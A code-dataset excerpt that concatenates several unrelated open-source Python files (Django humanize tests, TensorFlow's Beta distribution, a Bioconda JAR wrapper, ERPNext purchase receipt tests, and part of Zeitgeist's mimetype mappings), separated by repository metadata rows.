from django.utils.translation import ugettext as _
from django.utils.html import escape
add_to_builtins('django.contrib.humanize.templatetags.humanize')
class HumanizeTests(unittest.TestCase):
def humanize_tester(self, test_list, result_list, method):
# Using max below ensures we go through both lists
# However, if the lists are not equal length, this raises an exception
for index in xrange(max(len(test_list), len(result_list))):
test_content = test_list[index]
t = Template('{{ test_content|%s }}' % method)
rendered = t.render(Context(locals())).strip()
self.assertEqual(rendered, escape(result_list[index]),
msg="%s test failed, produced %s, should've produced %s" % (method, rendered, result_list[index]))
def test_ordinal(self):
test_list = ('1','2','3','4','11','12',
'13','101','102','103','111',
'something else')
result_list = ('1st', '2nd', '3rd', '4th', '11th',
'12th', '13th', '101st', '102nd', '103rd',
'111th', 'something else')
self.humanize_tester(test_list, result_list, 'ordinal')
def test_intcomma(self):
test_list = (100, 1000, 10123, 10311, 1000000, 1234567.25,
'100', '1000', '10123', '10311', '1000000', '1234567.1234567')
result_list = ('100', '1,000', '10,123', '10,311', '1,000,000', '1,234,567.25',
'100', '1,000', '10,123', '10,311', '1,000,000', '1,234,567.1234567')
self.humanize_tester(test_list, result_list, 'intcomma')
def test_intword(self):
test_list = ('100', '1000000', '1200000', '1290000',
'1000000000','2000000000','6000000000000')
result_list = ('100', '1.0 million', '1.2 million', '1.3 million',
'1.0 billion', '2.0 billion', '6.0 trillion')
self.humanize_tester(test_list, result_list, 'intword')
def test_apnumber(self):
test_list = [str(x) for x in range(1, 11)]
result_list = (u'one', u'two', u'three', u'four', u'five', u'six',
u'seven', u'eight', u'nine', u'10')
self.humanize_tester(test_list, result_list, 'apnumber')
def test_naturalday(self):
from django.template import defaultfilters
today = date.today()
yesterday = today - timedelta(days=1)
tomorrow = today + timedelta(days=1)
someday = today - timedelta(days=10)
notdate = u"I'm not a date value"
test_list = (today, yesterday, tomorrow, someday, notdate)
someday_result = defaultfilters.date(someday)
result_list = (_(u'today'), _(u'yesterday'), _(u'tomorrow'),
someday_result, u"I'm not a date value")
self.humanize_tester(test_list, result_list, 'naturalday')
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | -6,286,530,066,794,955,000 | -8,693,316,969,048,008,000 | 43.014085 | 127 | 0.57792 | false |
girving/tensorflow | tensorflow/python/ops/distributions/beta.py | 6 | 14810 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Beta distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"Beta",
"BetaWithSoftplusConcentration",
]
_beta_sample_note = """Note: `x` must have dtype `self.dtype` and be in
`[0, 1].` It must have a shape compatible with `self.batch_shape()`."""
@tf_export("distributions.Beta")
class Beta(distribution.Distribution):
"""Beta distribution.
The Beta distribution is defined over the `(0, 1)` interval using parameters
`concentration1` (aka "alpha") and `concentration0` (aka "beta").
#### Mathematical Details
The probability density function (pdf) is,
```none
pdf(x; alpha, beta) = x**(alpha - 1) (1 - x)**(beta - 1) / Z
Z = Gamma(alpha) Gamma(beta) / Gamma(alpha + beta)
```
where:
* `concentration1 = alpha`,
* `concentration0 = beta`,
* `Z` is the normalization constant, and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
The concentration parameters represent mean total counts of a `1` or a `0`,
i.e.,
```none
concentration1 = alpha = mean * total_concentration
concentration0 = beta = (1. - mean) * total_concentration
```
where `mean` in `(0, 1)` and `total_concentration` is a positive real number
representing a mean `total_count = concentration1 + concentration0`.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
Warning: The samples can be zero due to finite precision.
This happens more often when some of the concentrations are very small.
Make sure to round the samples to `np.finfo(dtype).tiny` before computing the
density.
Samples of this distribution are reparameterized (pathwise differentiable).
The derivatives are computed using the approach described in the paper
[Michael Figurnov, Shakir Mohamed, Andriy Mnih.
Implicit Reparameterization Gradients, 2018](https://arxiv.org/abs/1805.08498)
#### Examples
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
# Create a batch of three Beta distributions.
alpha = [1, 2, 3]
beta = [1, 2, 3]
dist = tfd.Beta(alpha, beta)
dist.sample([4, 5]) # Shape [4, 5, 3]
# `x` has three batch entries, each with two samples.
x = [[.1, .4, .5],
[.2, .3, .5]]
# Calculate the probability of each pair of samples under the corresponding
# distribution in `dist`.
dist.prob(x) # Shape [2, 3]
```
```python
# Create batch_shape=[2, 3] via parameter broadcast:
alpha = [[1.], [2]] # Shape [2, 1]
beta = [3., 4, 5] # Shape [3]
dist = tfd.Beta(alpha, beta)
# alpha broadcast as: [[1., 1, 1,],
# [2, 2, 2]]
# beta broadcast as: [[3., 4, 5],
# [3, 4, 5]]
# batch_Shape [2, 3]
dist.sample([4, 5]) # Shape [4, 5, 2, 3]
x = [.2, .3, .5]
# x will be broadcast as [[.2, .3, .5],
# [.2, .3, .5]],
# thus matching batch_shape [2, 3].
dist.prob(x) # Shape [2, 3]
```
Compute the gradients of samples w.r.t. the parameters:
```python
alpha = tf.constant(1.0)
beta = tf.constant(2.0)
dist = tfd.Beta(alpha, beta)
samples = dist.sample(5) # Shape [5]
loss = tf.reduce_mean(tf.square(samples)) # Arbitrary loss function
# Unbiased stochastic gradients of the loss function
grads = tf.gradients(loss, [alpha, beta])
```
"""
@deprecation.deprecated(
"2019-01-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.distributions`.",
warn_once=True)
def __init__(self,
concentration1=None,
concentration0=None,
validate_args=False,
allow_nan_stats=True,
name="Beta"):
"""Initialize a batch of Beta distributions.
Args:
concentration1: Positive floating-point `Tensor` indicating mean
number of successes; aka "alpha". Implies `self.dtype` and
`self.batch_shape`, i.e.,
`concentration1.shape = [N1, N2, ..., Nm] = self.batch_shape`.
concentration0: Positive floating-point `Tensor` indicating mean
number of failures; aka "beta". Otherwise has same semantics as
`concentration1`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[concentration1, concentration0]) as name:
self._concentration1 = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration1, name="concentration1"),
validate_args)
self._concentration0 = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration0, name="concentration0"),
validate_args)
check_ops.assert_same_float_dtype([
self._concentration1, self._concentration0])
self._total_concentration = self._concentration1 + self._concentration0
super(Beta, self).__init__(
dtype=self._total_concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.FULLY_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._concentration1,
self._concentration0,
self._total_concentration],
name=name)
@staticmethod
def _param_shapes(sample_shape):
return dict(zip(
["concentration1", "concentration0"],
[ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)] * 2))
@property
def concentration1(self):
"""Concentration parameter associated with a `1` outcome."""
return self._concentration1
@property
def concentration0(self):
"""Concentration parameter associated with a `0` outcome."""
return self._concentration0
@property
def total_concentration(self):
"""Sum of concentration parameters."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return constant_op.constant([], dtype=dtypes.int32)
def _event_shape(self):
return tensor_shape.scalar()
def _sample_n(self, n, seed=None):
expanded_concentration1 = array_ops.ones_like(
self.total_concentration, dtype=self.dtype) * self.concentration1
expanded_concentration0 = array_ops.ones_like(
self.total_concentration, dtype=self.dtype) * self.concentration0
gamma1_sample = random_ops.random_gamma(
shape=[n],
alpha=expanded_concentration1,
dtype=self.dtype,
seed=seed)
gamma2_sample = random_ops.random_gamma(
shape=[n],
alpha=expanded_concentration0,
dtype=self.dtype,
seed=distribution_util.gen_new_seed(seed, "beta"))
beta_sample = gamma1_sample / (gamma1_sample + gamma2_sample)
return beta_sample
@distribution_util.AppendDocstring(_beta_sample_note)
def _log_prob(self, x):
return self._log_unnormalized_prob(x) - self._log_normalization()
@distribution_util.AppendDocstring(_beta_sample_note)
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
@distribution_util.AppendDocstring(_beta_sample_note)
def _log_cdf(self, x):
return math_ops.log(self._cdf(x))
@distribution_util.AppendDocstring(_beta_sample_note)
def _cdf(self, x):
return math_ops.betainc(self.concentration1, self.concentration0, x)
def _log_unnormalized_prob(self, x):
x = self._maybe_assert_valid_sample(x)
return (math_ops.xlogy(self.concentration1 - 1., x) +
(self.concentration0 - 1.) * math_ops.log1p(-x))
def _log_normalization(self):
return (math_ops.lgamma(self.concentration1)
+ math_ops.lgamma(self.concentration0)
- math_ops.lgamma(self.total_concentration))
def _entropy(self):
return (
self._log_normalization()
- (self.concentration1 - 1.) * math_ops.digamma(self.concentration1)
- (self.concentration0 - 1.) * math_ops.digamma(self.concentration0)
+ ((self.total_concentration - 2.) *
math_ops.digamma(self.total_concentration)))
def _mean(self):
return self._concentration1 / self._total_concentration
def _variance(self):
return self._mean() * (1. - self._mean()) / (1. + self.total_concentration)
@distribution_util.AppendDocstring(
"""Note: The mode is undefined when `concentration1 <= 1` or
`concentration0 <= 1`. If `self.allow_nan_stats` is `True`, `NaN`
is used for undefined modes. If `self.allow_nan_stats` is `False` an
exception is raised when one or more modes are undefined.""")
def _mode(self):
mode = (self.concentration1 - 1.) / (self.total_concentration - 2.)
if self.allow_nan_stats:
nan = array_ops.fill(
self.batch_shape_tensor(),
np.array(np.nan, dtype=self.dtype.as_numpy_dtype()),
name="nan")
is_defined = math_ops.logical_and(self.concentration1 > 1.,
self.concentration0 > 1.)
return array_ops.where(is_defined, mode, nan)
return control_flow_ops.with_dependencies([
check_ops.assert_less(
array_ops.ones([], dtype=self.dtype),
self.concentration1,
message="Mode undefined for concentration1 <= 1."),
check_ops.assert_less(
array_ops.ones([], dtype=self.dtype),
self.concentration0,
message="Mode undefined for concentration0 <= 1.")
], mode)
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of a concentration parameter."""
if not validate_args:
return concentration
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
], concentration)
def _maybe_assert_valid_sample(self, x):
"""Checks the validity of a sample."""
if not self.validate_args:
return x
return control_flow_ops.with_dependencies([
check_ops.assert_positive(x, message="sample must be positive"),
check_ops.assert_less(
x,
array_ops.ones([], self.dtype),
message="sample must be less than `1`."),
], x)
class BetaWithSoftplusConcentration(Beta):
"""Beta with softplus transform of `concentration1` and `concentration0`."""
@deprecation.deprecated(
"2019-01-01",
"Use `tfd.Beta(tf.nn.softplus(concentration1), "
"tf.nn.softplus(concentration2))` instead.",
warn_once=True)
def __init__(self,
concentration1,
concentration0,
validate_args=False,
allow_nan_stats=True,
name="BetaWithSoftplusConcentration"):
parameters = dict(locals())
with ops.name_scope(name, values=[concentration1,
concentration0]) as name:
super(BetaWithSoftplusConcentration, self).__init__(
concentration1=nn.softplus(concentration1,
name="softplus_concentration1"),
concentration0=nn.softplus(concentration0,
name="softplus_concentration0"),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name)
self._parameters = parameters
@kullback_leibler.RegisterKL(Beta, Beta)
def _kl_beta_beta(d1, d2, name=None):
"""Calculate the batchwise KL divergence KL(d1 || d2) with d1 and d2 Beta.
Args:
d1: instance of a Beta distribution object.
d2: instance of a Beta distribution object.
name: (optional) Name to use for created operations.
default is "kl_beta_beta".
Returns:
Batchwise KL(d1 || d2)
"""
def delta(fn, is_property=True):
fn1 = getattr(d1, fn)
fn2 = getattr(d2, fn)
return (fn2 - fn1) if is_property else (fn2() - fn1())
with ops.name_scope(name, "kl_beta_beta", values=[
d1.concentration1,
d1.concentration0,
d1.total_concentration,
d2.concentration1,
d2.concentration0,
d2.total_concentration,
]):
return (delta("_log_normalization", is_property=False)
- math_ops.digamma(d1.concentration1) * delta("concentration1")
- math_ops.digamma(d1.concentration0) * delta("concentration0")
+ (math_ops.digamma(d1.total_concentration)
* delta("total_concentration")))
| apache-2.0 | -438,548,367,028,247,600 | -4,087,623,773,042,768,000 | 35.388206 | 80 | 0.651924 | false |
jerowe/bioconda-recipes | recipes/biopet-vcfstats/1.2/biopet-vcfstats.py | 80 | 3367 | #!/usr/bin/env python
#
# Wrapper script for starting the biopet-vcfstats JAR package
#
# This script is written for use with the Conda package manager and is copied
# from the peptide-shaker wrapper. Only the parameters are changed.
# (https://github.com/bioconda/bioconda-recipes/blob/master/recipes/peptide-shaker/peptide-shaker.py)
#
# This file was automatically generated by the sbt-bioconda plugin.
import os
import subprocess
import sys
import shutil
from os import access
from os import getenv
from os import X_OK
jar_file = 'VcfStats-assembly-1.2.jar'
default_jvm_mem_opts = []
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
"""Return the symlink-resolved, canonicalized directory-portion of path."""
return os.path.dirname(os.path.realpath(path))
def java_executable():
"""Return the executable name of the Java interpreter."""
java_home = getenv('JAVA_HOME')
java_bin = os.path.join('bin', 'java')
if java_home and access(os.path.join(java_home, java_bin), X_OK):
return os.path.join(java_home, java_bin)
else:
return 'java'
def jvm_opts(argv):
"""Construct list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
The return value is a 3-tuple lists of strings of the form:
(memory_options, prop_options, passthrough_options)
"""
mem_opts = []
prop_opts = []
pass_args = []
exec_dir = None
for arg in argv:
if arg.startswith('-D'):
prop_opts.append(arg)
elif arg.startswith('-XX'):
prop_opts.append(arg)
elif arg.startswith('-Xm'):
mem_opts.append(arg)
elif arg.startswith('--exec_dir='):
exec_dir = arg.split('=')[1].strip('"').strip("'")
if not os.path.exists(exec_dir):
shutil.copytree(real_dirname(sys.argv[0]), exec_dir, symlinks=False, ignore=None)
else:
pass_args.append(arg)
# In the original shell script the test coded below read:
# if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
# To reproduce the behaviour of the above shell code fragment
# it is important to explictly check for equality with None
# in the second condition, so a null envar value counts as True!
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_jvm_mem_opts
return (mem_opts, prop_opts, pass_args, exec_dir)
def main():
"""
PeptideShaker updates files relative to the path of the jar file.
In a multiuser setting, the option --exec_dir="exec_dir"
can be used as the location for the peptide-shaker distribution.
If the exec_dir dies not exist,
we copy the jar file, lib, and resources to the exec_dir directory.
"""
java = java_executable()
(mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:])
jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0])
if pass_args != [] and pass_args[0].startswith('eu'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = os.path.join(jar_dir, jar_file)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == '__main__':
main()
| mit | -6,006,615,689,996,553,000 | -205,897,438,320,255,330 | 30.46729 | 101 | 0.644194 | false |
YuriGural/erpnext | erpnext/stock/doctype/purchase_receipt/test_purchase_receipt.py | 10 | 10589 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe, erpnext
import frappe.defaults
from frappe.utils import cint, flt, cstr, today
from erpnext.stock.doctype.purchase_receipt.purchase_receipt import make_purchase_invoice
from erpnext import set_perpetual_inventory
from erpnext.accounts.doctype.account.test_account import get_inventory_account
class TestPurchaseReceipt(unittest.TestCase):
def setUp(self):
frappe.db.set_value("Buying Settings", None, "allow_multiple_items", 1)
def test_make_purchase_invoice(self):
pr = make_purchase_receipt(do_not_save=True)
self.assertRaises(frappe.ValidationError, make_purchase_invoice, pr.name)
pr.submit()
pi = make_purchase_invoice(pr.name)
self.assertEquals(pi.doctype, "Purchase Invoice")
self.assertEquals(len(pi.get("items")), len(pr.get("items")))
# modify rate
pi.get("items")[0].rate = 200
self.assertRaises(frappe.ValidationError, frappe.get_doc(pi).submit)
def test_purchase_receipt_no_gl_entry(self):
company = frappe.db.get_value('Warehouse', '_Test Warehouse - _TC', 'company')
set_perpetual_inventory(0, company)
existing_bin_stock_value = frappe.db.get_value("Bin", {"item_code": "_Test Item",
"warehouse": "_Test Warehouse - _TC"}, "stock_value")
pr = make_purchase_receipt()
stock_value_difference = frappe.db.get_value("Stock Ledger Entry",
{"voucher_type": "Purchase Receipt", "voucher_no": pr.name,
"item_code": "_Test Item", "warehouse": "_Test Warehouse - _TC"}, "stock_value_difference")
self.assertEqual(stock_value_difference, 250)
current_bin_stock_value = frappe.db.get_value("Bin", {"item_code": "_Test Item",
"warehouse": "_Test Warehouse - _TC"}, "stock_value")
self.assertEqual(current_bin_stock_value, existing_bin_stock_value + 250)
self.assertFalse(get_gl_entries("Purchase Receipt", pr.name))
def test_purchase_receipt_gl_entry(self):
pr = frappe.copy_doc(test_records[0])
set_perpetual_inventory(1, pr.company)
self.assertEqual(cint(erpnext.is_perpetual_inventory_enabled(pr.company)), 1)
pr.insert()
pr.submit()
gl_entries = get_gl_entries("Purchase Receipt", pr.name)
self.assertTrue(gl_entries)
stock_in_hand_account = get_inventory_account(pr.company, pr.get("items")[0].warehouse)
fixed_asset_account = get_inventory_account(pr.company, pr.get("items")[1].warehouse)
if stock_in_hand_account == fixed_asset_account:
expected_values = {
stock_in_hand_account: [750.0, 0.0],
"Stock Received But Not Billed - _TC": [0.0, 500.0],
"Expenses Included In Valuation - _TC": [0.0, 250.0]
}
else:
expected_values = {
stock_in_hand_account: [375.0, 0.0],
fixed_asset_account: [375.0, 0.0],
"Stock Received But Not Billed - _TC": [0.0, 500.0],
"Expenses Included In Valuation - _TC": [0.0, 250.0]
}
for gle in gl_entries:
self.assertEquals(expected_values[gle.account][0], gle.debit)
self.assertEquals(expected_values[gle.account][1], gle.credit)
pr.cancel()
self.assertFalse(get_gl_entries("Purchase Receipt", pr.name))
set_perpetual_inventory(0, pr.company)
def test_subcontracting(self):
from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry
make_stock_entry(item_code="_Test Item", target="_Test Warehouse 1 - _TC", qty=100, basic_rate=100)
make_stock_entry(item_code="_Test Item Home Desktop 100", target="_Test Warehouse 1 - _TC",
qty=100, basic_rate=100)
pr = make_purchase_receipt(item_code="_Test FG Item", qty=10, rate=500, is_subcontracted="Yes")
self.assertEquals(len(pr.get("supplied_items")), 2)
rm_supp_cost = sum([d.amount for d in pr.get("supplied_items")])
self.assertEquals(pr.get("items")[0].rm_supp_cost, flt(rm_supp_cost, 2))
def test_serial_no_supplier(self):
pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=1)
self.assertEquals(frappe.db.get_value("Serial No", pr.get("items")[0].serial_no, "supplier"),
pr.supplier)
pr.cancel()
self.assertFalse(frappe.db.get_value("Serial No", pr.get("items")[0].serial_no, "warehouse"))
def test_rejected_serial_no(self):
pr = frappe.copy_doc(test_records[0])
pr.get("items")[0].item_code = "_Test Serialized Item With Series"
pr.get("items")[0].qty = 3
pr.get("items")[0].rejected_qty = 2
pr.get("items")[0].received_qty = 5
pr.get("items")[0].rejected_warehouse = "_Test Rejected Warehouse - _TC"
pr.insert()
pr.submit()
accepted_serial_nos = pr.get("items")[0].serial_no.split("\n")
self.assertEquals(len(accepted_serial_nos), 3)
for serial_no in accepted_serial_nos:
self.assertEquals(frappe.db.get_value("Serial No", serial_no, "warehouse"),
pr.get("items")[0].warehouse)
rejected_serial_nos = pr.get("items")[0].rejected_serial_no.split("\n")
self.assertEquals(len(rejected_serial_nos), 2)
for serial_no in rejected_serial_nos:
self.assertEquals(frappe.db.get_value("Serial No", serial_no, "warehouse"),
pr.get("items")[0].rejected_warehouse)
def test_purchase_return(self):
set_perpetual_inventory()
pr = make_purchase_receipt()
return_pr = make_purchase_receipt(is_return=1, return_against=pr.name, qty=-2)
# check sle
outgoing_rate = frappe.db.get_value("Stock Ledger Entry", {"voucher_type": "Purchase Receipt",
"voucher_no": return_pr.name}, "outgoing_rate")
self.assertEqual(outgoing_rate, 50)
# check gl entries for return
gl_entries = get_gl_entries("Purchase Receipt", return_pr.name)
self.assertTrue(gl_entries)
stock_in_hand_account = get_inventory_account(return_pr.company)
expected_values = {
stock_in_hand_account: [0.0, 100.0],
"Stock Received But Not Billed - _TC": [100.0, 0.0],
}
for gle in gl_entries:
self.assertEquals(expected_values[gle.account][0], gle.debit)
self.assertEquals(expected_values[gle.account][1], gle.credit)
set_perpetual_inventory(0)
def test_purchase_return_for_rejected_qty(self):
set_perpetual_inventory()
pr = make_purchase_receipt(received_qty=4, qty=2)
return_pr = make_purchase_receipt(is_return=1, return_against=pr.name, received_qty = -4, qty=-2)
actual_qty = frappe.db.get_value("Stock Ledger Entry", {"voucher_type": "Purchase Receipt",
"voucher_no": return_pr.name, 'warehouse': return_pr.items[0].rejected_warehouse}, "actual_qty")
self.assertEqual(actual_qty, -2)
set_perpetual_inventory(0)
def test_purchase_return_for_serialized_items(self):
def _check_serial_no_values(serial_no, field_values):
serial_no = frappe.get_doc("Serial No", serial_no)
for field, value in field_values.items():
self.assertEquals(cstr(serial_no.get(field)), value)
from erpnext.stock.doctype.serial_no.serial_no import get_serial_nos
pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=1)
serial_no = get_serial_nos(pr.get("items")[0].serial_no)[0]
_check_serial_no_values(serial_no, {
"warehouse": "_Test Warehouse - _TC",
"purchase_document_no": pr.name
})
return_pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=-1,
is_return=1, return_against=pr.name, serial_no=serial_no)
_check_serial_no_values(serial_no, {
"warehouse": "",
"purchase_document_no": pr.name,
"delivery_document_no": return_pr.name
})
def test_closed_purchase_receipt(self):
from erpnext.stock.doctype.purchase_receipt.purchase_receipt import update_purchase_receipt_status
pr = make_purchase_receipt(do_not_submit=True)
pr.submit()
update_purchase_receipt_status(pr.name, "Closed")
self.assertEquals(frappe.db.get_value("Purchase Receipt", pr.name, "status"), "Closed")
def test_pr_billing_status(self):
# PO -> PR1 -> PI and PO -> PI and PO -> PR2
from erpnext.buying.doctype.purchase_order.test_purchase_order import create_purchase_order
from erpnext.buying.doctype.purchase_order.purchase_order \
import make_purchase_receipt, make_purchase_invoice as make_purchase_invoice_from_po
po = create_purchase_order()
pr1 = make_purchase_receipt(po.name)
pr1.posting_date = today()
pr1.posting_time = "10:00"
pr1.get("items")[0].received_qty = 2
pr1.get("items")[0].qty = 2
pr1.submit()
pi1 = make_purchase_invoice(pr1.name)
pi1.submit()
pr1.load_from_db()
self.assertEqual(pr1.per_billed, 100)
pi2 = make_purchase_invoice_from_po(po.name)
pi2.get("items")[0].qty = 4
pi2.submit()
pr2 = make_purchase_receipt(po.name)
pr2.posting_date = today()
pr2.posting_time = "08:00"
pr2.get("items")[0].received_qty = 5
pr2.get("items")[0].qty = 5
pr2.submit()
pr1.load_from_db()
self.assertEqual(pr1.get("items")[0].billed_amt, 1000)
self.assertEqual(pr1.per_billed, 100)
self.assertEqual(pr1.status, "Completed")
self.assertEqual(pr2.get("items")[0].billed_amt, 2000)
self.assertEqual(pr2.per_billed, 80)
self.assertEqual(pr2.status, "To Bill")
def get_gl_entries(voucher_type, voucher_no):
return frappe.db.sql("""select account, debit, credit
from `tabGL Entry` where voucher_type=%s and voucher_no=%s
order by account desc""", (voucher_type, voucher_no), as_dict=1)
def make_purchase_receipt(**args):
frappe.db.set_value("Buying Settings", None, "allow_multiple_items", 1)
pr = frappe.new_doc("Purchase Receipt")
args = frappe._dict(args)
pr.posting_date = args.posting_date or today()
if args.posting_time:
pr.posting_time = args.posting_time
pr.company = args.company or "_Test Company"
pr.supplier = args.supplier or "_Test Supplier"
pr.is_subcontracted = args.is_subcontracted or "No"
pr.supplier_warehouse = "_Test Warehouse 1 - _TC"
pr.currency = args.currency or "INR"
pr.is_return = args.is_return
pr.return_against = args.return_against
qty = args.qty or 5
received_qty = args.received_qty or qty
rejected_qty = args.rejected_qty or flt(received_qty) - flt(qty)
pr.append("items", {
"item_code": args.item or args.item_code or "_Test Item",
"warehouse": args.warehouse or "_Test Warehouse - _TC",
"qty": qty,
"received_qty": received_qty,
"rejected_qty": rejected_qty,
"rejected_warehouse": args.rejected_warehouse or "_Test Rejected Warehouse - _TC" if rejected_qty != 0 else "",
"rate": args.rate or 50,
"conversion_factor": 1.0,
"serial_no": args.serial_no,
"stock_uom": "_Test UOM"
})
if not args.do_not_save:
pr.insert()
if not args.do_not_submit:
pr.submit()
return pr
test_dependencies = ["BOM", "Item Price"]
test_records = frappe.get_test_records('Purchase Receipt')
| gpl-3.0 | 7,247,263,011,429,663,000 | 3,204,564,789,386,264,000 | 34.533557 | 113 | 0.702238 | false |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/zeitgeist/mimetypes.py | 3 | 10501 | # -.- coding: utf-8 -.-
# Zeitgeist
#
# Copyright © 2010 Markus Korn <[email protected]>
# Copyright © 2010 Canonical Ltd.
# By Mikkel Kamstrup Erlandsen <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
from datamodel import Interpretation, Manifestation
__all__ = [
"get_interpretation_for_mimetype",
"get_manifestation_for_uri",
]
class RegExpr(object):
""" Helper class which holds a compiled regular expression
and its pattern."""
def __init__(self, pattern):
self.pattern = pattern
self.regex = re.compile(self.pattern)
def __str__(self):
return self.pattern
def __getattr__(self, name):
return getattr(self.regex, name)
def make_regex_tuple(*items):
return tuple((RegExpr(k), v) for k, v in items)
def get_interpretation_for_mimetype(mimetype):
""" get interpretation for a given mimetype, returns :const:`None`
if none of the predefined interpretations matches
"""
interpretation = MIMES.get(mimetype, None)
if interpretation is not None:
return interpretation
for pattern, interpretation in MIMES_REGEX:
if pattern.match(mimetype):
return interpretation
return None
def get_manifestation_for_uri(uri):
""" Lookup Manifestation for a given uri based on the scheme part,
returns :const:`None` if no suitable manifestation is found
"""
for scheme, manifestation in SCHEMES:
if uri.startswith(scheme):
return manifestation
return None
MIMES = {
# x-applix-*
"application/x-applix-word": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-applix-spreadsheet": Interpretation.SPREADSHEET,
"application/x-applix-presents": Interpretation.PRESENTATION,
# x-kword, x-kspread, x-kpresenter, x-killustrator
"application/x-kword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-kspread": Interpretation.SPREADSHEET,
"application/x-kpresenter": Interpretation.PRESENTATION,
"application/x-killustrator": Interpretation.VECTOR_IMAGE,
# MS
"application/ms-powerpoint": Interpretation.PRESENTATION,
"application/vnd.ms-powerpoint": Interpretation.PRESENTATION,
"application/msword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/msexcel": Interpretation.SPREADSHEET,
"application/ms-excel": Interpretation.SPREADSHEET,
"application/vnd.ms-excel": Interpretation.SPREADSHEET,
# pdf, postscript et al
"application/pdf": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/postscript": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/ps": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/rtf": Interpretation.PAGINATED_TEXT_DOCUMENT,
"image/vnd.djvu": Interpretation.PAGINATED_TEXT_DOCUMENT,
# GNOME office
"application/x-abiword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-gnucash": Interpretation.SPREADSHEET,
"application/x-gnumeric": Interpretation.SPREADSHEET,
# TeX stuff
"text/x-tex": Interpretation.SOURCE_CODE,
"text/x-latex": Interpretation.SOURCE_CODE,
# Plain text
"text/plain": Interpretation.TEXT_DOCUMENT,
"text/csv": Interpretation.TEXT_DOCUMENT,
# HTML files on disk are always HTML_DOCUMENTS while online we should
# assume them to be WEBSITEs. By default we anticipate local files...
"text/html": Interpretation.HTML_DOCUMENT,
# Image types
"application/vnd.corel-draw": Interpretation.VECTOR_IMAGE,
"image/jpeg": Interpretation.RASTER_IMAGE,
"image/pjpeg": Interpretation.RASTER_IMAGE,
"image/png": Interpretation.RASTER_IMAGE,
"image/tiff": Interpretation.RASTER_IMAGE,
"image/gif": Interpretation.RASTER_IMAGE,
